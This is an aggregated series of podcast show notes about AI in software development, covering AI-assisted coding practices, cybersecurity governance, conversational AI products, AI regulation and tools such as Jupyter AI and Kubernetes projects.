James and Frank unwrap 2025 as the Year of AI Development, covering new models, the rise of agents, and editor integrations like Copilot in VS Code that changed how developers write and maintain code. You'll hear practical takeaways: how next-edit, local models, RAG/vectorization, and app-on-demand sped up prototyping and slashed maintenance time, and why the hosts think the AI boom has legs into 2026 despite looming uncertainty.
Follow Us
Frank: Twitter, Blog, GitHub
James: Twitter, Blog, GitHub
Merge Conflict: Twitter, Facebook, Website, Chat on Discord
Music: Amethyst Seer - Citrine by Adventureface
⭐⭐ Review Us (https://itunes.apple.com/us/podcast/merge-conflict/id1133064277?mt=2&ls=1) ⭐⭐
Machine transcription available on http://mergeconflict.fm
Podcast: PrOTect It All
Episode: AI, Governance & Cybersecurity Culture: Why People and Process Still Matter Most
Pub date: 2025-12-15
Cybersecurity has evolved from an afterthought to a business-critical responsibility - and AI is accelerating that shift faster than most organizations are ready for. In this episode of Protect It All, host Aaron Crow sits down with Sue McTaggart, a cybersecurity leader with a software development background and more than 15 years of experience driving security transformation. Together, they explore how cybersecurity success today depends less on shiny new tools and more on culture, governance, and fundamentals done right. Sue shares her journey from developer to cybersecurity leader, offering real-world insights into embedding security thinking into everyday work - not bolting it on after something breaks. The conversation tackles the realities of AI adoption, the risks of over-automation, and why human oversight and curiosity remain essential in an increasingly automated world.
You'll learn:
Why technology alone can't fix cybersecurity problems
How to embed a security-first mindset across teams and leadership
What AI changes - and what it doesn't - in cybersecurity governance
The role of Zero Trust and foundational cyber hygiene
Why people, process, and accountability prevent more breaches than tools
How generational shifts and curiosity shape the future of cyber careers
Whether you're a security leader, technologist, or business decision-maker navigating AI adoption, this episode delivers grounded, practical wisdom for building resilience that lasts. Tune in to learn why strong cybersecurity still starts with people, not platforms, only on Protect It All.
Key Moments:
01:12 Cybersecurity Evolution and Insights
03:51 "Cybersecurity Requires Culture Shift"
07:09 "Tech Failures and Curfew Challenges"
10:30 "Prioritizing Security in AI Development"
15:05 Cybersecurity's Role in Everything
19:37 "Everything is Sales"
23:54 Adapting Communication for Audiences
26:26 "Think Ahead, Stay Curious."
28:30 Tinkering and Curiosity Unleashed
31:32 "Gen Z: Redefining Work and Life."
36:17 Governing AI: Benefits and Risks
37:59 AI Needs Human Oversight
42:35 "AI's Role in Cybersecurity."
47:25 "Hackers Exploit Basic Vulnerabilities."
About the guest:
Sue McTaggart is a passionate educator and cybersecurity professional with a strong background in software development. Her curiosity and desire to raise awareness led her to transition from developing applications primarily in languages like Java in the early 2000s to the field of cybersecurity. Sue is dedicated to empowering others through education and strives to share her knowledge to help others better understand cybersecurity risks and solutions. She is honored and humbled by opportunities to speak about her work and continues to inspire those around her with her commitment to ongoing learning and public awareness.
How to connect Sue: https://www.linkedin.com/in/sue-mctaggart-24604158/
Connect With Aaron Crow:
Website: www.corvosec.com
LinkedIn: https://www.linkedin.com/in/aaronccrow
Learn more about PrOTect IT All:
Email: info@protectitall.co
Website: https://protectitall.co/
X: https://twitter.com/protectitall
YouTube: https://www.youtube.com/@PrOTectITAll
Facebook: https://facebook.com/protectitallpodcast
To be a guest or suggest a guest/episode, please email us at info@protectitall.co
Please leave us a review on Apple/Spotify Podcasts:
Apple - https://podcasts.apple.com/us/podcast/protect-it-all/id1727211124
Spotify - https://open.spotify.com/show/1Vvi0euj3rE8xObK0yvYi4
In this enlightening episode, Brandon Stiver is joined by Albert Chen, co-founder and CEO of Anago. The two discuss the profound impact of AI on Christian nonprofits. Albert shares his journey from community development in Mexico to the tech world and emphasizes the interconnectedness of global issues with the ethical considerations surrounding AI development. Albert demystifies AI, explaining the differences between machine learning and generative AI, and offers practical applications for nonprofits. He introduces the concept of Redemptive AI, advocating for its ethical use to benefit the global majority. The conversation concludes with a call for Christian organizations to engage thoughtfully with AI, ensuring it enhances their mission rather than detracts from it.
Podcast Sponsors: Take the free Core Elements Self-Assessment from the CAFO Research Center and tap into online courses with discount code 'TGDJ25'
Resources and Links from the show: Anago.ai Online | Praxis: A Redemptive Thesis for Artificial Intelligence
Support the Show Through Venmo - @canopyintl
Conversation Notes:
Introduction to AI and Its Impact on Nonprofits (2:30)
Albert's Journey through ministry and tech (5:22)
Understanding Global Interconnectedness (8:21)
The Role of Technology in Community Development (11:23)
Demystifying AI: Machine Learning vs. Generative AI (14:27)
Ethical Considerations in AI Development (17:20)
Navigating AI as a Christian Nonprofit Leader (20:39)
The Role of AI in Nonprofit Organizations (32:54)
Augmentation vs. Automation in Nonprofits (38:20)
Christian Hope and Responsibility in the Age of AI (43:24)
Theme music: Kirk Osamayo. Free Music Archive, CC BY License
Today, we explore the evolving landscape of conversational AI with Kylan Gibbs, the CEO and founder of InWorld AI. We focus on how InWorld develops AI products that enhance the creation of scalable applications, particularly in consumer contexts where user interaction is increasingly conversational. Kylan shares insights into the importance of real-time performance and how expectations differ between consumer and business applications. He emphasizes that while businesses often prioritize automation and factuality, consumer applications demand speed and engagement, requiring a nuanced approach to AI design. Join us as we delve into the technical challenges and innovations that are shaping the future of AI interactions.
The podcast features a deep dive into the evolving landscape of software architecture, focusing on the role of AI in modern applications. Our guest, Kylan Gibbs, the CEO of InWorld AI, discusses how his company builds AI products that facilitate real-time conversational experiences for users. Kylan emphasizes that the majority of consumer interactions with AI now occur through conversational interfaces, such as chatbots and voice assistants. He explains that InWorld specializes in creating scalable applications that not only meet user demands but also adapt to varying contexts, such as customer support, gaming, and educational applications. This adaptability is crucial because user expectations differ significantly across different scenarios. The conversation further explores the intricate balance between performance and user experience, highlighting how different user expectations influence the design and functionality of AI-driven applications. Kylan shares insights into the engineering challenges that come with real-time AI interactions, emphasizing the need for robust performance engineering to deliver smooth conversational flows.
He believes that as AI technology progresses, the focus should shift towards enhancing user engagement while maintaining high performance standards. Overall, this episode offers valuable insights into how software architects can navigate the complexities of integrating AI into consumer-facing applications while ensuring that the user experience remains at the forefront.
Takeaways:
InWorld AI focuses on creating conversational interfaces that improve user engagement in applications.
The performance of real-time conversational AI is crucial, requiring fast and precise responses.
Consumer AI applications need to adapt to various contexts, changing user expectations significantly.
Optimizing AI performance often requires using low-level programming languages like C for better control.
AI spending is increasingly shifting towards consumer applications, presenting new opportunities for developers.
Understanding the nuances of AI architecture is essential for creating effective conversational agents.
Links referenced in this episode:
softwarearchitectureinsights.com
inworld.ai
Companies mentioned in this episode: InWorld AI, OpenAI, Google
Mentioned in this episode:
How do you operate a modern organization at scale? Read more in my O'Reilly Media book "Architecting for Scale", now in its second edition. http://architectingforscale.com
What do 160,000 of your peers have in common? They've all boosted their skills and career prospects by taking one of my courses. Go to atchisonacademy.com.
Utah held an AI Summit yesterday, where the governor outlined six key areas he wants the state to focus on and emphasized that humans should stay in control. Greg and Holly discuss the latest and speak with Margaret Busse, Executive Director of Utah's Department of Commerce, about the event, the state's AI priorities, and how Utah can get ahead of the federal government on AI regulation.
AI Assisted Coding: Treating AI Like a Junior Engineer - Onboarding Practices for AI Collaboration
In this special episode, Sergey Sergyenko, CEO of Cybergizer, shares his practical framework for AI-assisted development built on transactional models, Git workflows, and architectural conventions. He explains why treating AI like a junior engineer, keeping commits atomic, and maintaining rollback strategies creates production-ready code rather than just prototypes.
Vibecoding: An Automation Design Instrument
"I would define Vibecoding as an automation design instrument. It's not a tool that can deliver end-to-end solution, but it's like a perfect set of helping hands for a person who knows what they need to do."
Sergey positions vibecoding clearly: it's not magic, it's an automation design tool. The person using it must know what they need to accomplish—AI provides the helping hands to execute that vision faster. This framing sets expectations appropriately: AI speeds up development significantly, but it's not a silver bullet that works without guidance. The more you practice vibecoding, the better you understand its boundaries. Sergey's definition places vibecoding in the evolution of development tools: from scaffolding to co-pilots to agentic coding to vibecoding. Each step increases automation, but the human architect remains essential for providing direction, context, and validation.
Pair Programming with the Machine
"If you treat AI as a junior engineer, it's very easy to adopt it. Ah, okay, maybe we just use the old traditions, how we onboard juniors to the team, and let AI follow this step."
One of Sergey's most practical insights is treating AI like a junior engineer joining your team. This mental model immediately clarifies roles and expectations. You wouldn't let a junior architect your system or write all your tests—so why let AI? Instead, apply existing onboarding practices: pair programming, code reviews, test-driven development, architectural guidance.
This approach leverages Extreme Programming practices that have worked for decades. The junior engineer analogy helps teams understand that AI needs mentorship, clear requirements, and frequent validation. Just as you'd provide a junior with frameworks and conventions to follow, you constrain AI with established architectural patterns and framework conventions like Ruby on Rails.
The Transactional Model: Atomic Commits and Rollback
"When you're working with AI, the more atomic commits it delivers, more easy for you to kind of guide and navigate it through the process of development."
Sergey's transactional approach transforms how developers work with AI. Instead of iterating endlessly when something goes wrong, commit frequently with atomic changes, then roll back and restart if validation fails. Each commit should be small, independent, and complete—like a feature flag you can toggle. The commit message includes the prompt sequence used to generate the code and rollback instructions. This approach makes the Git repository the context manager, not just the AI's memory. When you need to guide AI, you can reference specific commits and their context. This mirrors trunk-based development practices where teams commit directly to master with small, verified changes. The cost of rollback stays minimal because changes are atomic, making this strategy far more efficient than trying to fix broken implementations through iteration.
Context Management: The Weak Point and the Solution
"Managing context and keeping context is one of the weak points of today's coding agents, therefore we need to be very mindful in how we manage that context for the agent."
Context management challenges current AI coding tools—they forget, lose the thread, or misinterpret requirements over long sessions. Sergey's solution is embedding context within the commit history itself.
Each commit links back to the specific reasoning behind that code: why it was accepted, what iterations it took, and how to undo it if needed. This creates a persistent context trail that survives beyond individual AI sessions. When starting new features, developers can reference previous commits and their context to guide the AI. The transactional model doesn't just provide rollback capability—it creates institutional memory that makes AI progressively more effective as the codebase grows.
TDD 2.0: Humans Write Tests, AI Writes Code
"I would never allow AI to write the test. I would do it by myself. Still, it can write the code."
Sergey is adamant about roles: humans write tests, AI writes implementation code. This inverts traditional TDD slightly—instead of developers writing tests then code, they write tests and AI writes the code to pass them. Tests become executable requirements and prompts. This provides essential guardrails: AI can iterate on implementation until tests pass, but it can't redefine what "passing" means. The tests represent domain knowledge, business requirements, and validation criteria that only humans should control. Sergey envisions multi-agent systems where one agent writes code while another validates with tests, but critically, humans author the original test suite. This TDD 2.0 framework (the subject of a talk Sergey gave at the Global Agile Summit) creates a verification mechanism that prevents the biggest anti-pattern: coding without proper validation.
The Two Cardinal Rules: Architecture and Verification
"I would never allow AI to invent architecture. Writing AI agentic coding, Vibecoding, whatever coding—without proper verification and properly setting expectations of what you want to get as a result—that's the main mistake."
Sergey identifies two non-negotiables. First, never let AI invent architecture. Use framework conventions (Rails, etc.) to constrain AI's choices. Leverage existing code generators and scaffolding.
Provide explicit architectural guidelines in planning steps. Store iteration-specific instructions where AI can reference them. The framework becomes the guardrails that prevent AI from making structural decisions it's not equipped to make. Second, always verify AI output. Even if you don't want to look at the code, you must validate that it meets requirements. This might be through tests, manual review, or automated checks—but skipping verification is the fundamental mistake. These two rules—human-defined architecture and mandatory verification—separate successful AI-assisted development from technical debt generation.
Prototype vs. Production: Two Different Workflows
"When you pair as an architect or a really senior engineer who can implement it by himself, but just wants to save time, you do the pair programming with AI, and the AI kind of ships a draft, and rapid prototype."
Sergey distinguishes clearly between prototype and production development. For MVPs and rapid prototypes, a senior architect pairs with AI to create drafts quickly—this is where speed matters most. For production code, teams add more iterative testing and polishing after AI generates the initial implementation. The key is being explicit about which mode you're in. The biggest anti-pattern is treating prototype code as production-ready without the necessary validation and hardening steps. When building production systems, Sergey applies the full transactional model: atomic commits, comprehensive tests, architectural constraints, and rollback strategies. For prototypes, speed takes priority, but the architectural knowledge still comes from humans, not AI.
The Future: AI Literacy as Mandatory
"Being a software engineer and trying to get a new job, it's gonna be a mandatory requirement for you to understand how to use AI for coding. So it's not enough to just be a good engineer."
Sergey sees AI-assisted coding literacy becoming as fundamental as Git proficiency.
Future engineering jobs will require demonstrating effective AI collaboration, not just traditional coding skills. We're reaching good performance levels with AI models—now the challenge is learning to use them efficiently. This means frameworks and standardized patterns for AI-assisted development will emerge and consolidate. Approaches like AAID, SpecKit, and others represent early attempts to create these patterns. Sergey expects architectural patterns for AI-assisted development to standardize, similar to how design patterns emerged in object-oriented programming. The human remains the bottleneck—for domain knowledge, business requirements, and architectural guidance—but the implementation mechanics shift heavily toward AI collaboration.
Resources for Practitioners
"We are reaching a good performance level of AI models, and now we need to guide it to make it impactful. It's a great tool, now we need to understand how to make it impactful."
Sergey recommends Obie Fernandez's work on "Patterns of Application Development Using AI," particularly valuable for Ruby and Rails developers but applicable broadly. He references Andrej Karpathy's original vibecoding post and emphasizes Extreme Programming practices as foundational. The tools he uses—Cursor and Claude Code—support custom planning steps and context management. But more important than tools is the mindset: we have powerful AI capabilities now, and the focus must shift to efficient usage patterns. This means experimenting with workflows, documenting what works, and sharing patterns with the community. Sergey himself shares case studies on LinkedIn and travels extensively speaking about these approaches, contributing to the collective learning happening in real time.
About Sergey Sergyenko
Sergey is the CEO of Cybergizer, a dynamic software development agency with offices in Vilnius, Lithuania. Specializing in MVPs with zero cash requirements, Cybergizer offers top-tier CTO services and startup teams.
Their tech stack includes Ruby, Rails, Elixir, and ReactJS. Sergey was also a featured speaker at the Global Agile Summit, and you can find his talk available in your membership area. If you are not a member don't worry, you can get the 1-month trial and watch the whole conference. You can cancel at any time. You can link with Sergey Sergyenko on LinkedIn.
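Sergey's transactional model—atomic commits that carry the prompt that produced them, with a cheap rollback when validation fails—can be sketched in a few lines of Python. The class names, the in-memory workspace, and the validate callback below are illustrative stand-ins, not anything shown in the episode:

```python
from dataclasses import dataclass, field

@dataclass
class AICommit:
    """One atomic AI-generated change, plus the prompt that produced it."""
    summary: str
    prompt: str   # prompt sequence kept so the history doubles as context
    files: dict   # path -> new content introduced by this change

@dataclass
class TransactionalSession:
    """Git-like loop: apply small commits, roll back on failed validation."""
    workspace: dict = field(default_factory=dict)  # path -> current content
    history: list = field(default_factory=list)

    def apply(self, commit, validate):
        """Apply one atomic commit; keep it only if validation passes."""
        snapshot = dict(self.workspace)       # cheap rollback point
        self.workspace.update(commit.files)
        if validate(self.workspace):
            self.history.append(commit)       # accepted: prompt joins the trail
            return True
        self.workspace = snapshot             # rejected: roll back, don't iterate on broken code
        return False

    def context_trail(self):
        """Prompts recoverable from history, for guiding the next AI session."""
        return [(c.summary, c.prompt) for c in self.history]

# One accepted change, one rejected (and rolled-back) change:
session = TransactionalSession()
ok = session.apply(
    AICommit("add greet()", "Write a greet() that returns 'hello'",
             {"app.py": "def greet():\n    return 'hello'\n"}),
    validate=lambda ws: "def greet" in ws.get("app.py", ""),
)
bad = session.apply(
    AICommit("break greet()", "Rewrite greet() from scratch", {"app.py": "oops"}),
    validate=lambda ws: "def greet" in ws.get("app.py", ""),
)
```

Because each change is atomic and validated before it enters history, a failed step costs one rollback rather than a debugging session—the same economics Sergey describes for Git itself.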
BONUS: Augmented AI Development - Software Engineering First, AI Second
In this special episode, Dawid Dahl introduces Augmented AI Development (AAID)—a disciplined approach where professional developers augment their capabilities with AI while maintaining full architectural control. He explains why starting with software engineering fundamentals and adding AI where appropriate is the opposite of most frameworks, and why this approach produces production-grade software rather than technical debt.
The AAID Philosophy: Don't Abandon Your Brain
"Two of the fundamental developer principles for AAID are: first, don't abandon your brain. And the second is incremental steps."
Dawid's Augmented AI Development framework stands in stark contrast to "vibecoding"—which he defines strictly as not caring about code at all, only results on screen. AAID is explicitly designed for professional developers who maintain full understanding and control of their systems. The framework is positioned on the furthest end of the spectrum from vibe coding, requiring developers to know their craft deeply. The two core principles—don't abandon your brain, work incrementally—reflect a philosophy that AI is a powerful collaborator, not a replacement for thinking. This approach recognizes that while 96% of Dawid's code is now written by AI, he remains the architect, constantly steering and verifying every step. In this segment we refer to Marcus Hammarberg's work and his book The Bungsu Story.
Software Engineering First, AI Second: A Hill to Die On
"You should start with software engineering wisdom, and then only add AI where it's actually appropriate. I think this is super, super important, and the entire foundation of this framework. This is a hill I will personally die on."
What makes AAID fundamentally different from other AI-assisted development frameworks is its starting point. Most frameworks start with AI capabilities and try to add structure and best practices afterward.
Dawid argues this is completely backwards. AAID begins with 50-60 years of proven software engineering wisdom—test-driven development, behavior-driven development, continuous delivery—and only then adds AI where it enhances the process. This isn't a minor philosophical difference; it's the foundation of producing maintainable, production-grade software. Dawid admits he's sometimes "manipulating developers to start using good, normal software engineering practices, but in this shiny AI box that feels very exciting and new." If the AI wrapper helps developers finally adopt TDD and BDD, he's fine with that.
Why TDD is Non-Negotiable with AI
"Every time I prompt an AI and it writes code for me, there is often at least one or two or three mistakes that will cause catastrophic mistakes down the line and make the software impossible to change."
Test-driven development isn't just a nice-to-have in AAID—it's essential. Dawid has observed that AI consistently makes two or three mistakes per prompt that could have catastrophic consequences later. Without TDD's red-green-refactor cycle, these errors accumulate, making code increasingly difficult to change. TDD answers the question "Is my code technically correct?" while acceptance tests answer "Is the system releasable?" Both are needed for production-grade software. The refactor step is where 50-60 years of software engineering wisdom gets applied to make code maintainable. This matters because AAID isn't vibe coding—developers care deeply about code quality, not just visible results. Good software, as Dave Farley says, is software that's easy to change. Without TDD, AI-generated code becomes a maintenance nightmare.
The Problem with "Prompt and Pray" Autonomous Agents
"When I hear 'our AI can now code for over 30 hours straight without stopping,' I get very afraid. You fall asleep, and the next morning, the code is done. Maybe the tests are green. But what has it done in there? Imagine everything it does for 30 hours.
This system will not work."
Dawid sees two diverging paths for AI-assisted development's future. The first—autonomous agents working for hours or days without supervision—terrifies him. The marketing pitch sounds appealing: prompt the AI, go to sleep, wake up to completed features. But the reality is technical debt accumulation at scale. Imagine all the decisions, all the architectural choices, all the mistakes an AI makes over 30 hours of autonomous work. Dawid advocates for the stark contrast: working in extremely small increments with constant human steering, always aligned to specifications. His vision of the future isn't AI working alone—it's voice-controlled confirmations where he says "Yes, yes, no, yes" as AI proposes each tiny change. This aligns with DORA metrics showing that high-performing teams work in small batches with fast feedback loops.
Prerequisites: Product Discovery Must Come First
"Without Dave Farley, this framework would be totally different. I think he does everything right, basically. With this framework, I want to stand on the shoulders of giants and work on top of what has already been done."
AAID explicitly requires product discovery and specification phases before AI-assisted coding begins. This is based on Dave Farley's product journey model, which shows how products move from idea to production. AAID starts at the "executable specifications" stage—it requires input specifications from prior discovery work. This separates specification creation (which Dawid is addressing in a separate "Dream Encoder" framework) from code execution. The prerequisite isn't arbitrary; it acknowledges that AI-assisted implementation works best when the problem is well-defined. This "standing on the shoulders of giants" approach means AAID doesn't try to reinvent software engineering—it leverages decades of proven practices from TDD pioneers, BDD creators, and continuous delivery experts.
What's Wrong with Other AI Frameworks
"When the AI decides to check the box [in task lists], that means this is the definition of done. But how is the AI taking that decision? It's totally ad hoc. It's like going back to the 1980s: 'I wrote the code, I'm done.' But what does that mean? Nobody has any idea."
Dawid is critical of current AI frameworks like SpecKit, pointing out fundamental flaws. They start with AI first and try to add structure later (a backwards approach). They use task lists with checkboxes where AI decides when something is "done"—but without clear criteria, this becomes ad hoc decision-making reminiscent of 1980s development practices. These frameworks "vibecode the specs," not realizing there's a structured taxonomy to specifications that BDD already solved. Most concerning, some have removed testing as a "feature," treating it as optional. Dawid sees these frameworks as over-engineered, process-centric rather than developer-centric, often created by people who may not develop software themselves. AAID, in contrast, is built by a practicing developer solving real problems daily.
Getting Started: Learn Fundamentals First
"The first thing developers should do is learn the fundamentals. They should skip AI altogether and learn about BDD and TDD, just best practices. But when you know that, then you can look into a framework, maybe like mine."
Dawid's advice for developers interested in AI-assisted coding might seem counterintuitive: start by learning fundamentals without AI. Master behavior-driven development, test-driven development, and software engineering best practices first. Only after understanding these foundations should developers explore frameworks like AAID. This isn't gatekeeping—it's recognizing that AI amplifies whatever approach developers bring. If they start with poor practices, AI will help them build unmaintainable systems faster.
But if they start with solid fundamentals, AI becomes a powerful multiplier that lets them work at unprecedented speed while maintaining quality. AAID offers both a dense technical article on dev.to and a gentler, game-like onboarding in the GitHub repo, meeting developers wherever they are in their journey.
About Dawid Dahl
Dawid is the creator of Augmented AI Development (AAID), a disciplined approach where developers augment their capabilities by integrating with AI, while maintaining full architectural control. Dawid is a software engineer at Umain, a product development agency. You can link with Dawid Dahl on LinkedIn and find the AAID framework on GitHub.
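Both Sergyenko's and Dahl's episodes converge on the same guardrail: humans author the tests, and AI-generated code is accepted only once it passes them. A minimal sketch of that acceptance loop, with an invented "double the input" requirement and two hypothetical AI candidates:

```python
def human_test_suite(impl):
    """Human-authored tests: executable requirements the AI cannot redefine."""
    try:
        assert impl(0) == 0
        assert impl(3) == 6
        assert impl(-2) == -4
    except AssertionError:
        return False
    return True

def accept_candidate(candidates, test_suite):
    """The AI may iterate on implementations, but the human suite defines 'passing'."""
    for impl in candidates:
        if test_suite(impl):
            return impl
    return None  # nothing passed: reject rather than ship unverified code

# Two hypothetical AI-proposed implementations of "double the input":
buggy = lambda x: x + x + 1   # red: fails the human-written tests
correct = lambda x: 2 * x     # green: passes, so it is accepted

chosen = accept_candidate([buggy, correct], human_test_suite)
```

The tests encode the requirement; the loop is the "AI iterates until green" step both guests describe, with the human retaining control of what "green" means.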
China's AI Strategy and Chip Self-Sufficiency
Guest: Jack Burnham
Jack Burnham discussed China's AI development, which prioritizes political control and self-sufficiency over immediate excellence. He pointed to the Cyberspace Administration of China banning large internet companies from purchasing high-end Nvidia processors, with the CCP aiming to build out its own domestic systems and insulate itself from potential U.S. leverage. The Chinese DeepSeek AI model, meanwhile, is considered a "good enough" open-source competitor thanks to its low cost, accessibility, and high quality in certain computations, despite some identified security issues.
The robots aren't in charge... yet!
In this episode of the She Geeks Out podcast, we chat with Rashmi Jolly, founder of Assideo Consulting, global innovation leader, and deeply thoughtful future-of-work nerd, to talk about what happens when AI collides with humanity, power, and culture.
Rashmi shares her wild journey from immigrant kid with "doctor or bust" expectations, to Wall Street, to entrepreneurship in women's health and genetics, to roles at the Economist Intelligence Unit, Mastercard, and Bain's innovation group, and now to life split between Dubai, Zurich, and her kids' school in the U.S.
Together, we explore:
How AI is being treated like the new high-priced consultant, and what gets lost when leaders trust the tool more than their own people
The quiet ways generative AI is eroding creativity, learning, and confidence, especially for younger workers who never got to solve problems without it
The ethics red flags Rashmi is most worried about, from biased datasets in women's health to opaque data collection and "empathetic" chatbots that are a little too good at keeping us hooked
How different countries (including China, Singapore, and the UAE) are regulating tech, education, and kids' screen time, and what the U.S.
might learn from that, even with all the complexities and human rights concerns
Why psychological safety is non-negotiable for real innovation, and how framing work as "serving another human" changes everything
Rashmi also shares hopeful stories about her kids and their peers, the emotional language they're developing, and why she still believes the next generation can pull us out of this feverish tech dream and back into a more grounded, human way of working.
If you care about AI, inclusion, power, leadership, and what kind of world we're handing to young people, this one will stick with you long after you hit pause.
Episode Chapters:
(0:00:07) - Intro (Felicia and Rachel) Neuroscience of Trust in Workplace
(0:10:16) - Navigating a Dynamic Work Landscape
(0:16:45) - Reimagining Work in AI-Era
(0:28:00) - Balancing Empathy in AI Development
(0:41:33) - Building Psychological Safety for Innovation
(0:54:19) - Ethical Concerns in AI Development
(1:00:52) - Cultural Perspectives on Future Work
Visit us at InclusionGeeks.com to stay up to date on all the ways you can make the workplace work for everyone! Check out Inclusion Geeks Academy and InclusionGeeks.com/podcast for the code to get a free mini course.
Dive deep into the transformative power of Generative AI in the public safety sector with Chad Brothers, Vice President for Emergency Services Programs at Viiz Communications, on this episode of Cloud and Clear! Viiz Communications is addressing the critical challenges faced by 911 centers (PSAPs), including a significant staffing crisis and the distraction caused by high volumes of non-emergency calls. Learn how their solution uses Gen AI with conversational "playbooks" and a Retrieval-Augmented Generation (RAG) approach to efficiently triage and respond to non-urgent inquiries. Chad Brothers explains how this intelligent routing lessens the workload on human telecommunicators, allowing them to focus on emergencies, and details future plans to automate into CAD systems and integrate spatial data.
Key Takeaways:
Viiz Communications is an emergency services solutions provider, supporting call centers and non-emergency solutions in the public safety space.
Gen AI provides a technology solution to the staffing crisis and high volume of non-emergency calls at 911 centers.
The solution uses playbooks and a RAG approach to formulate accurate, generative responses from public and non-public data.
It improves telecommunicator quality of life by reducing non-emergency call volume and context switching.
True emergencies that come through administrative lines are immediately filtered out and follow a deterministic flow to a human 911 agent.
Tune in to discover how AI is enhancing service and support for our telecommunicators and communities! Join us for more content by liking, sharing, and subscribing!
Connect with SADA & Viiz Communications: Learn more about SADA: https://sada.com/cloud-and-clear/ Explore Viiz Communications: https://viiz.com/ Learn more about ViizVital: https://viiz.com/viizviital Read our Viiz Communications case study: https://sada.com/customer-story/viiz-communications-launches-next-generation-911-call-solution-on-google-cloud-ccaas-with-sadas-help/ Host: Chad Johnson, Director of AI Development at Insight Guest: Chad Brothers, Vice President of Emergency Services Programs at Viiz Communications
Major banks once built their own Linux kernels because no distributions existed, but today commercial distros — and Kubernetes — are universal. At KubeCon + CloudNativeCon North America, AWS's Jesse Butler noted that Kubernetes has reached the same maturity Linux once did: organizations no longer build bespoke control planes but rely on shared standards. That shift influences how AWS contributes to open source, emphasizing community-wide solutions rather than AWS-specific products. Butler highlighted two AWS EKS projects donated to Kubernetes SIGs: KRO and Karpenter. KRO addresses the proliferation of custom controllers that emerged once CRDs made everything representable as Kubernetes resources. By generating CRDs and microcontrollers from simple YAML schemas, KRO transforms “glue code” into an automated service within Kubernetes itself. Karpenter tackles the limits of traditional autoscaling by delivering just-in-time, cost-optimized node provisioning with a flexible, intuitive API. Both projects embody AWS's evolving philosophy: building features that serve the entire Kubernetes ecosystem as it matures into a true enterprise standard.
Learn more from The New Stack about the latest in Kube Resource Orchestrator and Karpenter:
Migrating From Cluster Autoscaler to Karpenter v0.32
How Amazon EKS Auto Mode Simplifies Kubernetes Cluster Management (Part 1)
Kubernetes Gets a New Resource Orchestrator in the Form of Kro
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
Clockwork began with a narrow goal—keeping clocks synchronized across servers—but soon realized that its precise latency measurements could reveal deeper data center networking issues. This insight led the company to build a hardware-agnostic monitoring and remediation platform capable of automatically routing around faults. Today, Clockwork's technology is especially valuable for large GPU clusters used in training LLMs, where communication efficiency and reliability are critical. CEO Suresh Vasudevan explains that AI workloads are among the most demanding distributed applications ever, and Clockwork provides building blocks that improve visibility, performance and fault tolerance. Its flagship feature, FleetIQ, can reroute traffic around failing switches, preventing costly interruptions that might otherwise force teams to restart training from hours-old checkpoints. Although the company originated from Stanford research focused on clock synchronization for financial institutions, the team eventually recognized that packet-timing data could underpin powerful network telemetry and dynamic traffic control. By integrating with NVIDIA NCCL, TCP and RDMA libraries, Clockwork can not only measure congestion but also actively manage GPU communication to enhance both uptime and training efficiency.
Learn more from The New Stack about the latest in Clockwork:
Clockwork's FleetIQ Aims To Fix AI's Costly Network Bottleneck
What Happens When 116 Makers Reimagine the Clock?
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
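The packet-timing math behind clock synchronization gives a flavor of why precise timestamps double as latency telemetry. This is the textbook NTP-style estimate from four timestamps, not Clockwork's proprietary algorithm (their Stanford-derived approach is more sophisticated):

```python
# Classic NTP-style estimation: from four timestamps (client send t1, server
# receive t2, server send t3, client receive t4), recover both the clock
# offset between the two machines and the network round-trip delay.
def offset_and_delay(t1: float, t2: float, t3: float, t4: float) -> tuple[float, float]:
    offset = ((t2 - t1) + (t3 - t4)) / 2.0  # server clock minus client clock
    delay = (t4 - t1) - (t3 - t2)           # round trip, excluding server hold time
    return offset, delay

# Example: the server's clock runs 0.5 s ahead of the client's, and the
# one-way network latency is 10 ms in each direction.
off, d = offset_and_delay(t1=100.000, t2=100.510, t3=100.511, t4=100.021)
print(off, d)  # offset ≈ 0.5 s, delay ≈ 0.02 s
```

The same exchange that corrects the clocks yields the `delay` term, which is exactly the per-path latency signal a platform like Clockwork's can mine for congestion and fault detection.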
Jupyter AI v3 marks a major step forward in integrating intelligent coding assistance directly into JupyterLab. Discussed by AWS engineers David Qiu and Piyush Jain at JupyterCon, the new release introduces AI personas — customizable, specialized assistants that users can configure to perform tasks such as coding help, debugging, or analysis. Unlike other AI tools, Jupyter AI allows multiple named agents, such as “Claude Code” or “OpenAI Codex,” to coexist in one chat. Developers can even build and share their own personas as local or pip-installable packages. This flexibility was enabled by splitting Jupyter AI's previously large, complex codebase into smaller, modular packages, allowing users to install or replace components as needed. Looking ahead, Qiu envisions Jupyter AI as an “ecosystem of AI personas,” enabling multi-agent collaboration where different personas handle roles like data science, engineering, and testing. With contributors from AWS, Apple, Quansight, and others, the project is poised to expand into a diverse, community-driven AI ecosystem.
Learn more from The New Stack about the latest in Jupyter AI development:
Introduction to Jupyter Notebooks for Developers
Display AI-Generated Images in a Jupyter Notebook
Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
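The "multiple named personas coexisting in one chat" idea reduces to a registry that dispatches @-mentions to named handlers. The sketch below is purely illustrative — the decorator, registry, and routing convention are invented here and do not reflect Jupyter AI's actual persona API:

```python
# Hypothetical persona registry: named assistants register themselves,
# and an @-mention in a chat message routes the prompt to the right one.
from typing import Callable

PERSONAS: dict[str, Callable[[str], str]] = {}

def persona(name: str):
    """Decorator that registers a handler under a chat-addressable name."""
    def register(fn: Callable[[str], str]) -> Callable[[str], str]:
        PERSONAS[name] = fn
        return fn
    return register

@persona("debugger")
def debugger(prompt: str) -> str:
    return f"[debugger] analyzing: {prompt}"

@persona("data-scientist")
def data_scientist(prompt: str) -> str:
    return f"[data-scientist] exploring: {prompt}"

def route(message: str) -> str:
    # "@debugger why does this fail?" dispatches to the named persona;
    # anything else falls through to a default assistant.
    if message.startswith("@"):
        name, _, prompt = message[1:].partition(" ")
        if name in PERSONAS:
            return PERSONAS[name](prompt)
    return "[default] " + message

print(route("@debugger why does this fail?"))
```

Because each persona is just a registered callable, shipping one as a pip-installable package — as the episode describes — amounts to importing a module that runs its registration on load.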
